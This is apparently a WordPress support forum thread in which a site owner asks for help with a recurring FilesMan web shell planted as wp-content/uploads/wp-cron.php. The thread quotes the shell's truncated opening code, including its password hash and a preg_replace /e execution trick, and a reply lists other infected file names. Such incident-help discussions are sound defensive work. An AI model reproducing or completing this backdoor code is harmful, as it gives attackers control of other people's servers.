Filesman hack

  • Hi

    I’ve found an infected file on one of my client websites. The file is wp-content/uploads/wp-cron.php and the file begins with the following code:

    <?php # Web Shell by oRb
    $auth_pass = “bdfa762517dbee605ddea6ac0205b3ec”;
    $color = “#df5”;
    $default_action = ‘FilesMan’;
    $default_use_ajax = true;
    $default_charset = ‘Windows-1251’;
    preg_replace(“/.*/e”,”\x65\x7……

    I’ve followed all the advice I could find online, I can’t find any base64_decode script and this is the only instance there is on my server.

    I’ve changed all passwords, installed BulletProof security but this file just keeps coming back everytime I delete it!

    None of my other client sites seem to have been infected.

    Tearing my hair out!! Any advice gratefully received!

Viewing 2 replies - 1 through 2 (of 2 total)

  • I found the same thing. I think it came from the WP-Symposium plugin, but I can’t be sure. I’m terrified it might have come from a plugin I wrote — DrawBlog — but in any case, I’m ripping out files that were modified around the date of the initial installation of this file.

    I’m finding a ton of files named “security.php” and “footer_front_page.php” — them’s bad news.

    Oops – I want to be notified of any replies here. Checking the little box now.

Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘Filesman hack’ is closed to new replies.